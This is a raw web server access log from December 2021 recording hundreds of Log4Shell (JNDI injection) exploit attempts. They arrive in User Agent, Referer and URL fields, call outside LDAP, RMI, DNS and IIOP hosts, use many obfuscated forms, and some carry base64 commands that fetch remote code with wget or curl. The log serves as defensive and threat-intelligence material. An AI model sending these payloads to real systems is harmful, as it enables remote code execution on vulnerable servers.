    User Agent: ${jndi:ldap://45.33.5.105.c6y2trk2vtc00005ghfggdxbpceyyyyyb.interact.sh/65ue5i6}

2021-12-17 210.18.138.230
    URL: GET /
    Referer: -
    User Agent: ${jndi:ldap://172.105.34.103:1389/a}

2021-12-17 210.18.138.230
    URL: GET /
    Referer: -
    User Agent: ${jndi:ldap://172.105.34.103:1389/a}

2021-12-17 45.83.64.57
    URL: GET /?id=%24%7B%24%7B%3A%3A-j%7Dndi%3Adns%3A%2F%2F45.83.64.1%2Fsecurityscan-eqawvr622guhykmi%7
    Referer: ${${::-j}ndi:dns://45.83.64.1/securityscan-epigiripg65kkjta}
    User Agent: ${${::-j}ndi:dns://45.83.64.1/securityscan-yw5ba3t56rmgulku}

2021-12-17 128.90.61.199
    URL: GET //$%7Bjndi:iiop://128.90.61.199:8243/1639715774%7D
    Referer: ${jndi:iiop://128.90.61.199:8243/1639715774}
    User Agent: ${jndi:iiop://128.90.61.199:8243/1639715774}

2021-12-17 104.236.5.167
    URL: GET /
    Referer: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://185.254.196.236:1389/jijec}
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://185.254.196.236:1389/jijec}

2021-12-17 104.236.5.167
    URL: GET /
    Referer: ${jndi:rmi://185.254.196.236:1389/jijec}
    User Agent: ${jndi:rmi://185.254.196.236:1389/jijec}

2021-12-17 104.236.5.167
    URL: GET /
    Referer: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://185.254.196.236:1389/jijec}
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://185.254.196.236:1389/jijec}

2021-12-17 104.236.5.167
    URL: GET /
    Referer: ${jndi:rmi://185.254.196.236:1389/jijec}
    User Agent: ${jndi:rmi://185.254.196.236:1389/jijec}

2021-12-17 149.202.179.100
    URL: GET /
    Referer: ${${::-j}ndi:rmi://185.254.196.236:1389/jijec}
    User Agent: ${${::-j}ndi:rmi://185.254.196.236:1389/jijec}

2021-12-17 149.202.179.100
    URL: GET /
    Referer: ${${::-j}ndi:rmi://185.254.196.236:1389/jijec}
    User Agent: ${${::-j}ndi:rmi://185.254.196.236:1389/jijec}

2021-12-17 93.84.115.205
    URL: GET /
    Referer: ${${::-j}ndi:rmi://185.254.196.236:1389/jijec}
    User Agent: ${${::-j}ndi:rmi://185.254.196.236:1389/jijec}

2021-12-17 93.84.115.205
    URL: GET /
    Referer: ${${::-j}ndi:rmi://185.254.196.236:1389/jijec}
    User Agent: ${${::-j}ndi:rmi://185.254.196.236:1389/jijec}

2021-12-17 93.84.115.205
    URL: GET /
    Referer: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://185.254.196.236:1389/jijec}
    User Agent: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://185.254.196.236:1389/jijec}

2021-12-17 93.84.115.205
    URL: GET /
    Referer: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://185.254.196.236:1389/jijec}
    User Agent: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://185.254.196.236:1389/jijec}

2021-12-17 213.139.206.152
    URL: GET /
    Referer: ${${lower:jndi}:${lower:rmi}://185.254.196.236:1389/jijec}
    User Agent: ${${lower:jndi}:${lower:rmi}://185.254.196.236:1389/jijec}

2021-12-17 213.139.206.152
    URL: GET /
    Referer: ${${lower:jndi}:${lower:rmi}://185.254.196.236:1389/jijec}
    User Agent: ${${lower:jndi}:${lower:rmi}://185.254.196.236:1389/jijec}

2021-12-17 213.139.206.152
    URL: GET /
    Referer: ${${lower:${lower:jndi}}${lower:rmi}://185.254.196.236:1389/jijec}
    User Agent: ${${lower:${lower:jndi}}:${lower:rmi}://185.254.196.236:1389/jijec}

2021-12-17 165.22.28.103
    URL: GET /
    Referer: ${${lower:j}${lower:n}$lower:d}i:${lower:rmi}://185.254.196.236:1389/jijec}
    User Agent: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://185.254.196.236:1389/jijec}

2021-12-17 165.22.28.103
    URL: GET /
    Referer: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://185.254.196.236:1389/jijec}
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://185.254.196.236:1389/jijec}

2021-12-17 138.197.90.158
    URL: GET /
    Referer: ${jndi:rmi://185.254.196.236:1389/jijec}
    User Agent: ${jndi:rmi://185.254.196.236:1389/jijec}

2021-12-17 138.197.90.158
    URL: GET /
    Referer: ${jndi:rmi://185.254.196.236:1389/jijec}
    User Agent: ${jndi:rmi://185.254.196.236:1389/jijec}

2021-12-17 138.197.90.158
    URL: GET /
    Referer: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://185.254.196.236:1389/jijec}
    User Agent: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://185.254.196.236:1389/jijec}

2021-12-17 138.197.90.158
    URL: GET /
    Referer: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://185.254.196.236:1389/jijec}
    User Agent: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://185.254.196.236:1389/jijec}

2021-12-17 82.223.14.60
    URL: GET /
    Referer: ${${lower:${lower:jndi}}${lower:rmi}://185.254.196.236:1389/jijec}
    User Agent: ${${lower:${lower:jndi}}:${lower:rmi}://185.254.196.236:1389/jijec}

2021-12-17 82.223.14.60
    URL: GET /
    Referer: ${${lower:${lower:jndi}}${lower:rmi}://185.254.196.236:1389/jijec}
    User Agent: ${${lower:${lower:jndi}}:${lower:rmi}://185.254.196.236:1389/jijec}

2021-12-17 203.151.232.5
    URL: GET /
    Referer: ${jndi:rmi://185.254.196.236:1389/jijec}
    User Agent: ${jndi:rmi://185.254.196.236:1389/jijec}

2021-12-17 203.151.232.5
    URL: GET /
    Referer: ${jndi:rmi://185.254.196.236:1389/jijec}
    User Agent: ${jndi:rmi://185.254.196.236:1389/jijec}

2021-12-17 194.225.58.28
    URL: GET /
    Referer: ${${lower:j}${lower:n}$lower:d}i:${lower:rmi}://185.254.196.236:1389/jijec}
    User Agent: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://185.254.196.236:1389/jijec}

2021-12-17 194.225.58.28
    URL: GET /
    Referer: ${${lower:jndi}:${lower:rmi}://185.254.196.236:1389/jijec}
    User Agent: ${${lower:jndi}:${lower:rmi}://185.254.196.236:1389/jijec}

2021-12-17 81.30.157.43
    URL: GET /
    Referer: ${jndi:ldap://81.30.157.43:1389/Basic/Command/Base64/Y2QgL3RtcDt3Z2V0IGh0dHA6Ly8xNTUuOTQuMTU0LjE3MC9
    User Agent: ${jndi:ldap://81.30.157.43:1389/Basic/Command/Base64/Y2QgL3RtcDt3Z2V0IGh0dHA6Ly8xNTUuOTQuMTU0LjE3MC9

2021-12-17 81.30.157.43
    URL: GET /
    Referer: ${jndi:ldap://81.30.157.43:1389/Basic/Command/Base64/Y2QgL3RtcDt3Z2V0IGh0dHA6Ly8xNTUuOTQuMTU0LjE3MC9
    User Agent: ${jndi:ldap://81.30.157.43:1389/Basic/Command/Base64/Y2QgL3RtcDt3Z2V0IGh0dHA6Ly8xNTUuOTQuMTU0LjE3MC9

2021-12-17 81.30.157.43
    URL: GET /
    Referer: ${jndi:ldap://81.30.157.43:1389/Basic/Command/Base64/Y2QgL3RtcDt3Z2V0IGh0dHA6Ly8xNTUuOTQuMTU0LjE3MC9
    User Agent: ${jndi:ldap://81.30.157.43:1389/Basic/Command/Base64/Y2QgL3RtcDt3Z2V0IGh0dHA6Ly8xNTUuOTQuMTU0LjE3MC9

2021-12-17 81.30.157.43
    URL: GET /
    Referer: ${jndi:ldap://81.30.157.43:1389/Basic/Command/Base64/Y2QgL3RtcDt3Z2V0IGh0dHA6Ly8xNTUuOTQuMTU0LjE3MC9
    User Agent: ${jndi:ldap://81.30.157.43:1389/Basic/Command/Base64/Y2QgL3RtcDt3Z2V0IGh0dHA6Ly8xNTUuOTQuMTU0LjE3MC9

2021-12-17 81.30.157.43
    URL: GET /
    Referer: ${jndi:ldap://81.30.157.43:1389/Basic/Command/Base64/Y2QgL3RtcDt3Z2V0IGh0dHA6Ly8xNTUuOTQuMTU0LjE3MC9
    User Agent: ${jndi:ldap://81.30.157.43:1389/Basic/Command/Base64/Y2QgL3RtcDt3Z2V0IGh0dHA6Ly8xNTUuOTQuMTU0LjE3MC9

2021-12-17 81.30.157.43
    URL: GET /
    Referer: ${jndi:ldap://81.30.157.43:1389/Basic/Command/Base64/Y2QgL3RtcDt3Z2V0IGh0dHA6Ly8xNTUuOTQuMTU0LjE3MC9
    User Agent: ${jndi:ldap://81.30.157.43:1389/Basic/Command/Base64/Y2QgL3RtcDt3Z2V0IGh0dHA6Ly8xNTUuOTQuMTU0LjE3MC9

2021-12-17 81.30.157.43
    URL: GET /
    Referer: ${jndi:ldap://81.30.157.43:1389/Basic/Command/Base64/Y2QgL3RtcDt3Z2V0IGh0dHA6Ly8xNTUuOTQuMTU0LjE3MC9
    User Agent: ${jndi:ldap://81.30.157.43:1389/Basic/Command/Base64/Y2QgL3RtcDt3Z2V0IGh0dHA6Ly8xNTUuOTQuMTU0LjE3MC9

2021-12-17 81.30.157.43
    URL: GET /
    Referer: ${jndi:ldap://81.30.157.43:1389/Basic/Command/Base64/Y2QgL3RtcDt3Z2V0IGh0dHA6Ly8xNTUuOTQuMTU0LjE3MC9
    User Agent: ${jndi:ldap://81.30.157.43:1389/Basic/Command/Base64/Y2QgL3RtcDt3Z2V0IGh0dHA6Ly8xNTUuOTQuMTU0LjE3MC9

2021-12-17 81.30.157.43
    URL: GET /
    Referer: ${jndi:ldap://81.30.157.43:1389/Basic/Command/Base64/Y2QgL3RtcDt3Z2V0IGh0dHA6Ly8xNTUuOTQuMTU0LjE3MC9
    User Agent: ${jndi:ldap://81.30.157.43:1389/Basic/Command/Base64/Y2QgL3RtcDt3Z2V0IGh0dHA6Ly8xNTUuOTQuMTU0LjE3MC9

2021-12-17 81.30.157.43
    URL: GET /
    Referer: ${jndi:ldap://81.30.157.43:1389/Basic/Command/Base64/Y2QgL3RtcDt3Z2V0IGh0dHA6Ly8xNTUuOTQuMTU0LjE3MC9
    User Agent: ${jndi:ldap://81.30.157.43:1389/Basic/Command/Base64/Y2QgL3RtcDt3Z2V0IGh0dHA6Ly8xNTUuOTQuMTU0LjE3MC9

2021-12-17 81.30.157.43
    URL: GET /
    Referer: ${jndi:ldap://81.30.157.43:1389/Basic/Command/Base64/Y2QgL3RtcDt3Z2V0IGh0dHA6Ly8xNTUuOTQuMTU0LjE3MC9
    User Agent: ${jndi:ldap://81.30.157.43:1389/Basic/Command/Base64/Y2QgL3RtcDt3Z2V0IGh0dHA6Ly8xNTUuOTQuMTU0LjE3MC9

2021-12-17 81.30.157.43
    URL: GET /
    Referer: ${jndi:ldap://81.30.157.43:1389/Basic/Command/Base64/Y2QgL3RtcDt3Z2V0IGh0dHA6Ly8xNTUuOTQuMTU0LjE3MC9
    User Agent: ${jndi:ldap://81.30.157.43:1389/Basic/Command/Base64/Y2QgL3RtcDt3Z2V0IGh0dHA6Ly8xNTUuOTQuMTU0LjE3MC9

2021-12-17 81.30.157.43
    URL: GET /
    Referer: ${jndi:ldap://81.30.157.43:1389/Basic/Command/Base64/Y2QgL3RtcDt3Z2V0IGh0dHA6Ly8xNTUuOTQuMTU0LjE3MC9
    User Agent: ${jndi:ldap://81.30.157.43:1389/Basic/Command/Base64/Y2QgL3RtcDt3Z2V0IGh0dHA6Ly8xNTUuOTQuMTU0LjE3MC9

2021-12-17 81.30.157.43
    URL: GET /
    Referer: ${jndi:ldap://81.30.157.43:1389/Basic/Command/Base64/Y2QgL3RtcDt3Z2V0IGh0dHA6Ly8xNTUuOTQuMTU0LjE3MC9
    User Agent: ${jndi:ldap://81.30.157.43:1389/Basic/Command/Base64/Y2QgL3RtcDt3Z2V0IGh0dHA6Ly8xNTUuOTQuMTU0LjE3MC9

2021-12-17 81.30.157.43
    URL: GET /
    Referer: ${jndi:ldap://81.30.157.43:1389/Basic/Command/Base64/Y2QgL3RtcDt3Z2V0IGh0dHA6Ly8xNTUuOTQuMTU0LjE3MC9
    User Agent: ${jndi:ldap://81.30.157.43:1389/Basic/Command/Base64/Y2QgL3RtcDt3Z2V0IGh0dHA6Ly8xNTUuOTQuMTU0LjE3MC9

2021-12-17 81.30.157.43
    URL: GET /
    Referer: ${jndi:ldap://81.30.157.43:1389/Basic/Command/Base64/Y2QgL3RtcDt3Z2V0IGh0dHA6Ly8xNTUuOTQuMTU0LjE3MC9
    User Agent: ${jndi:ldap://81.30.157.43:1389/Basic/Command/Base64/Y2QgL3RtcDt3Z2V0IGh0dHA6Ly8xNTUuOTQuMTU0LjE3MC9

2021-12-17 81.30.157.43
    URL: GET /
    Referer: ${jndi:ldap://81.30.157.43:1389/Basic/Command/Base64/Y2QgL3RtcDt3Z2V0IGh0dHA6Ly8xNTUuOTQuMTU0LjE3MC9
    User Agent: ${jndi:ldap://81.30.157.43:1389/Basic/Command/Base64/Y2QgL3RtcDt3Z2V0IGh0dHA6Ly8xNTUuOTQuMTU0LjE3MC9

2021-12-17 81.30.157.43
    URL: GET /
    Referer: ${jndi:ldap://81.30.157.43:1389/Basic/Command/Base64/Y2QgL3RtcDt3Z2V0IGh0dHA6Ly8xNTUuOTQuMTU0LjE3MC9
    User Agent: ${jndi:ldap://81.30.157.43:1389/Basic/Command/Base64/Y2QgL3RtcDt3Z2V0IGh0dHA6Ly8xNTUuOTQuMTU0LjE3MC9

2021-12-17 81.30.157.43
    URL: GET /
    Referer: ${jndi:ldap://81.30.157.43:1389/Basic/Command/Base64/Y2QgL3RtcDt3Z2V0IGh0dHA6Ly8xNTUuOTQuMTU0LjE3MC9
    User Agent: ${jndi:ldap://81.30.157.43:1389/Basic/Command/Base64/Y2QgL3RtcDt3Z2V0IGh0dHA6Ly8xNTUuOTQuMTU0LjE3MC9

2021-12-17 81.30.157.43
    URL: GET /
    Referer: ${jndi:ldap://81.30.157.43:1389/Basic/Command/Base64/Y2QgL3RtcDt3Z2V0IGh0dHA6Ly8xNTUuOTQuMTU0LjE3MC9
    User Agent: ${jndi:ldap://81.30.157.43:1389/Basic/Command/Base64/Y2QgL3RtcDt3Z2V0IGh0dHA6Ly8xNTUuOTQuMTU0LjE3MC9

2021-12-17 81.30.157.43
    URL: GET /
    Referer: ${jndi:ldap://81.30.157.43:1389/Basic/Command/Base64/Y2QgL3RtcDt3Z2V0IGh0dHA6Ly8xNTUuOTQuMTU0LjE3MC9
    User Agent: ${jndi:ldap://81.30.157.43:1389/Basic/Command/Base64/Y2QgL3RtcDt3Z2V0IGh0dHA6Ly8xNTUuOTQuMTU0LjE3MC9

2021-12-17 81.30.157.43
    URL: GET /
    Referer: ${jndi:ldap://81.30.157.43:1389/Basic/Command/Base64/Y2QgL3RtcDt3Z2V0IGh0dHA6Ly8xNTUuOTQuMTU0LjE3MC9
    User Agent: ${jndi:ldap://81.30.157.43:1389/Basic/Command/Base64/Y2QgL3RtcDt3Z2V0IGh0dHA6Ly8xNTUuOTQuMTU0LjE3MC9

2021-12-17 81.30.157.43
    URL: GET /
    Referer: ${jndi:ldap://81.30.157.43:1389/Basic/Command/Base64/Y2QgL3RtcDt3Z2V0IGh0dHA6Ly8xNTUuOTQuMTU0LjE3MC9
    User Agent: ${jndi:ldap://81.30.157.43:1389/Basic/Command/Base64/Y2QgL3RtcDt3Z2V0IGh0dHA6Ly8xNTUuOTQuMTU0LjE3MC9

2021-12-17 81.30.157.43
    URL: GET /
    Referer: ${jndi:ldap://81.30.157.43:1389/Basic/Command/Base64/Y2QgL3RtcDt3Z2V0IGh0dHA6Ly8xNTUuOTQuMTU0LjE3MC9
    User Agent: ${jndi:ldap://81.30.157.43:1389/Basic/Command/Base64/Y2QgL3RtcDt3Z2V0IGh0dHA6Ly8xNTUuOTQuMTU0LjE3MC9

2021-12-17 81.30.157.43
    URL: GET /
    Referer: ${jndi:ldap://81.30.157.43:1389/Basic/Command/Base64/Y2QgL3RtcDt3Z2V0IGh0dHA6Ly8xNTUuOTQuMTU0LjE3MC9
    User Agent: ${jndi:ldap://81.30.157.43:1389/Basic/Command/Base64/Y2QgL3RtcDt3Z2V0IGh0dHA6Ly8xNTUuOTQuMTU0LjE3MC9

2021-12-17 81.30.157.43
    URL: GET /
    Referer: ${jndi:ldap://81.30.157.43:1389/Basic/Command/Base64/Y2QgL3RtcDt3Z2V0IGh0dHA6Ly8xNTUuOTQuMTU0LjE3MC9
    User Agent: ${jndi:ldap://81.30.157.43:1389/Basic/Command/Base64/Y2QgL3RtcDt3Z2V0IGh0dHA6Ly8xNTUuOTQuMTU0LjE3MC9

2021-12-17 195.54.160.149
    URL: GET /
    Referer: https://x.y.168.168:443/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1L
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-17 195.54.160.149
    URL: GET /
    Referer: https://x.y.169.9:443/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-17 85.187.218.53
    URL: GET /
    Referer: ${jndi:rmi://185.254.196.236:1389/jijec}
    User Agent: ${jndi:rmi://185.254.196.236:1389/jijec}

2021-12-17 85.187.218.53
    URL: GET /
    Referer: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://185.254.196.236:1389/jijec}
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://185.254.196.236:1389/jijec}

2021-12-17 212.47.241.181
    URL: GET /
    Referer: ${jndi:ldap://185.254.196.236:1389/jijec}
    User Agent: ${jndi:ldap://185.254.196.236:1389/jijec}

2021-12-17 212.47.241.181
    URL: GET /
    Referer: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://185.254.196.236:1389/jijec}
    User Agent: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://185.254.196.236:1389/jijec}

2021-12-16 167.99.1.248
    URL: GET /
    Referer: ${jndi:ldap://185.254.196.236:1389/jijec}
    User Agent: ${jndi:ldap://185.254.196.236:1389/jijec}

2021-12-16 167.99.1.248
    URL: GET /
    Referer: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://185.254.196.236:1389/jijec}
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://185.254.196.236:1389/jijec}

2021-12-16 153.92.5.242
    URL: GET /
    Referer: ${${lower:j}${upper:n}$lower:d}${upper:i}:${lower:r}m${lower:i}}://185.254.196.236:1389/jijec}
    User Agent: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://185.254.196.236:1389/jijec}

2021-12-16 153.92.5.242
    URL: GET /
    Referer: ${${::-j}ndi:rmi://185.254.196.236:1389/jijec}
    User Agent: ${${::-j}ndi:rmi://185.254.196.236:1389/jijec}

2021-12-16 153.92.5.242
    URL: GET /
    Referer: ${${lower:j}${upper:n}$lower:d}${upper:i}:${lower:r}m${lower:i}}://185.254.196.236:1389/jijec}
    User Agent: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://185.254.196.236:1389/jijec}

2021-12-16 153.92.5.242
    URL: GET /
    Referer: ${${::-j}ndi:rmi://185.254.196.236:1389/jijec}
    User Agent: ${${::-j}ndi:rmi://185.254.196.236:1389/jijec}

2021-12-16 75.119.137.253
    URL: GET /
    Referer: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://185.254.196.236:1389/jijec}
    User Agent: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://185.254.196.236:1389/jijec}

2021-12-16 75.119.137.253
    URL: GET /
    Referer: ${jndi:rmi://185.254.196.236:1389/jijec}
    User Agent: ${jndi:rmi://185.254.196.236:1389/jijec}

2021-12-16 94.237.84.12
    URL: GET /
    Referer: ${jndi:ldap://185.254.196.236:1389/jijec}
    User Agent: ${jndi:ldap://185.254.196.236:1389/jijec}

2021-12-16 94.237.84.12
    URL: GET /
    Referer: ${jndi:rmi://185.254.196.236:1389/jijec}
    User Agent: ${jndi:rmi://185.254.196.236:1389/jijec}

2021-12-16 94.237.84.12
    URL: GET /
    Referer: ${jndi:ldap://185.254.196.236:1389/jijec}
    User Agent: ${jndi:ldap://185.254.196.236:1389/jijec}

2021-12-16 94.237.84.12
    URL: GET /
    Referer: ${jndi:rmi://185.254.196.236:1389/jijec}
    User Agent: ${jndi:rmi://185.254.196.236:1389/jijec}

2021-12-16 45.83.67.46
    URL: GET /?id=%24%7B%24%7B%3A%3A-j%7Dndi%3Adns%3A%2F%2F45.83.64.1%2Fsecurityscan-eqawxrrr2guhykp5%7
    Referer: http://149.28.222.143:80/?id=%24%7B%24%7B%3A%3A-j%7Dndi%3Adns%3A%2F%2F45.83.64.1%2Fsecurityscan-eqaw
    User Agent: ${${::-j}ndi:dns://45.83.64.1/securityscan-yw5bc34w6rmguljd}

2021-12-16 61.244.241.194
    URL: GET /
    Referer: ${jndi:ldap://185.254.196.236:1389/jijec}
    User Agent: ${jndi:ldap://185.254.196.236:1389/jijec}

2021-12-16 61.244.241.194
    URL: GET /
    Referer: ${${::-j}${::-n}${::-d${::-i}:${::-r}${::-m}${::-i}://185.254.196.236:1389/jijec}
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://185.254.196.236:1389/jijec}

2021-12-16 188.166.217.40
    URL: GET /
    Referer: ${${lower:jndi}:${lower:rmi}://185.254.196.236:1389/jijec}
    User Agent: ${${lower:jndi}:${lower:rmi}://185.254.196.236:1389/jijec}

2021-12-16 188.166.217.40
    URL: GET /
    Referer: ${${::-j}ndi:rmi://185.254.196.236:1389/jijec}
    User Agent: ${${::-j}ndi:rmi://185.254.196.236:1389/jijec}

2021-12-16 62.151.181.35
    URL: GET /
    Referer: ${${lower:${lower:jndi}}:${lower:rmi}://185.254.196.236:1389/jijec}
    User Agent: ${${lower:${lower:jndi}}:${lower:rmi}://185.254.196.236:1389/jijec}

2021-12-16 62.151.181.35
    URL: GET /
    Referer: ${${lower:${lower:jndi}}:${lower:rmi}://185.254.196.236:1389/jijec}
    User Agent: ${${lower:${lower:jndi}}:${lower:rmi}://185.254.196.236:1389/jijec}

2021-12-16 75.119.141.231
    URL: GET /
    Referer: ${${::-j}ndi:rmi://185.254.196.236:1389/jijec}
    User Agent: ${${::-j}ndi:rmi://185.254.196.236:1389/jijec}

2021-12-16 75.119.141.231
    URL: GET /
    Referer: ${${::-j}ndi:rmi://185.254.196.236:1389/jijec}
    User Agent: ${${::-j}ndi:rmi://185.254.196.236:1389/jijec}

2021-12-16 75.119.141.231
    URL: GET /
    Referer: ${${lower:${lower:jndi}}${lower:rmi}://185.254.196.236:1389/jijec}
    User Agent: ${${lower:${lower:jndi}}:${lower:rmi}://185.254.196.236:1389/jijec}

2021-12-16 75.119.141.231
    URL: GET /
    Referer: ${${lower:${lower:jndi}}${lower:rmi}://185.254.196.236:1389/jijec}
    User Agent: ${${lower:${lower:jndi}}:${lower:rmi}://185.254.196.236:1389/jijec}

2021-12-16 79.143.181.160
    URL: GET /
    Referer: ${jndi:rmi://185.254.196.236:1389/jijec}
    User Agent: ${jndi:rmi://185.254.196.236:1389/jijec}

2021-12-16 79.143.181.160
    URL: GET /
    Referer: ${${lower:jndi}:${lower:rmi}://185.254.196.236:1389/jijec}
    User Agent: ${${lower:jndi}:${lower:rmi}://185.254.196.236:1389/jijec}

2021-12-16 79.143.181.160
    URL: GET /
    Referer: ${${lower:jndi}:${lower:rmi}://185.254.196.236:1389/jijec}
    User Agent: ${${lower:jndi}:${lower:rmi}://185.254.196.236:1389/jijec}

2021-12-16 195.201.119.105
    URL: GET /
    Referer: ${${lower:j}${upper:n${lower:d}${upper:i}:${lower:r}m${lower:i}}://185.254.196.236:1389/jijec}
    User Agent: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://185.254.196.236:1389/jijec}

2021-12-16 195.201.119.105
    URL: GET /
    Referer: ${${::-j}ndi:rmi://185.254.196.236:1389/jijec}
    User Agent: ${${::-j}ndi:rmi://185.254.196.236:1389/jijec}

2021-12-16 195.201.119.105
    URL: GET /
    Referer: ${${::-j}ndi:rmi://185.254.196.236:1389/jijec}
    User Agent: ${${::-j}ndi:rmi://185.254.196.236:1389/jijec}

2021-12-16 37.59.29.60
    URL: GET /
    Referer: ${${lower:${lower:jndi}}:${lower:rmi}://185.254.196.236:1389/jijec}
    User Agent: ${${lower:${lower:jndi}}:${lower:rmi}://185.254.196.236:1389/jijec}

2021-12-16 37.59.29.60
    URL: GET /
    Referer: ${${lower:${lower:jndi}}:${lower:rmi}://185.254.196.236:1389/jijec}
    User Agent: ${${lower:${lower:jndi}}:${lower:rmi}://185.254.196.236:1389/jijec}

2021-12-16 37.59.29.60
    URL: GET /
    Referer: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://185.254.196.236:1389/jijec}
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://185.254.196.236:1389/jijec}

2021-12-16 37.59.29.60
    URL: GET /
    Referer: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://185.254.196.236:1389/jijec}
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://185.254.196.236:1389/jijec}

2021-12-16 164.163.0.34
    URL: GET /
    Referer: ${jndi:ldap://185.254.196.236:1389/jijec}
    User Agent: ${jndi:ldap://185.254.196.236:1389/jijec}

2021-12-16 164.163.0.34
    URL: GET /
    Referer: ${${::-j}ndi:rmi://185.254.196.236:1389/jijec}
    User Agent: ${${::-j}ndi:rmi://185.254.196.236:1389/jijec}

2021-12-16 82.223.14.60
    URL: GET /
    Referer: ${jndi:rmi://185.254.196.236:1389/jijec}
    User Agent: ${jndi:rmi://185.254.196.236:1389/jijec}

2021-12-16 82.223.14.60
    URL: GET /
    Referer: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://185.254.196.236:1389/jijec}
    User Agent: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://185.254.196.236:1389/jijec}

2021-12-16 202.182.106.33
    URL: GET /
    Referer: ${${::-j}${::-n}${::-d}$::-i}:${::-r}${::-m}${::-i}://185.254.196.236:1389/jijec}
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://185.254.196.236:1389/jijec}

2021-12-16 202.182.106.33
    URL: GET /
    Referer: ${${::-j}${::-n}${::-d}$::-i}:${::-r}${::-m}${::-i}://185.254.196.236:1389/jijec}
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://185.254.196.236:1389/jijec}

2021-12-16 128.90.61.199
    URL: GET //$%7Bjndi:iiop://128.90.61.199:9176/1639675562%7D
    Referer: ${jndi:iiop://128.90.61.199:9176/1639675562}
    User Agent: ${jndi:iiop://128.90.61.199:9176/1639675562}

2021-12-16 159.203.86.161
    URL: GET /
    Referer: ${jndi:rmi://185.254.196.236:1389/jijec}
    User Agent: ${jndi:rmi://185.254.196.236:1389/jijec}

2021-12-16 159.203.86.161
    URL: GET /
    Referer: ${${::-j}ndi:rmi://185.254.196.236:1389/jijec}
    User Agent: ${${::-j}ndi:rmi://185.254.196.236:1389/jijec}

2021-12-16 159.203.86.161
    URL: GET /
    Referer: ${jndi:rmi://185.254.196.236:1389/jijec}
    User Agent: ${jndi:rmi://185.254.196.236:1389/jijec}

2021-12-16 159.203.86.161
    URL: GET /
    Referer: ${${::-j}ndi:rmi://185.254.196.236:1389/jijec}
    User Agent: ${${::-j}ndi:rmi://185.254.196.236:1389/jijec}

2021-12-16 195.54.160.149
    URL: GET /
    Referer: http://x.y.169.253:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-16 195.54.160.149
    URL: GET /
    Referer: http://140.82.47.4:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-16 195.54.160.149
    URL: GET /
    Referer: http://x.y.168.253:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-16 45.77.27.93
    URL: GET /?v=%24%7Bjndi%3Adns%3A%2F%2F45.79.48.177.x2p7pn2l65sw477gl48rlgt5u2m42s8lo.interact.sh%7D
    Referer: -
    User Agent: log4j-scan

2021-12-16 45.77.27.93
    URL: GET /?v=%24%7B%24%7Blower%3A%24%7Blower%3Ajndi%7D%7D%3A%24%7Blower%3Armi%7D%3A%2F%2F%7B%7Bcall
    Referer: -
    User Agent: log4j-scan

2021-12-16 45.77.27.93
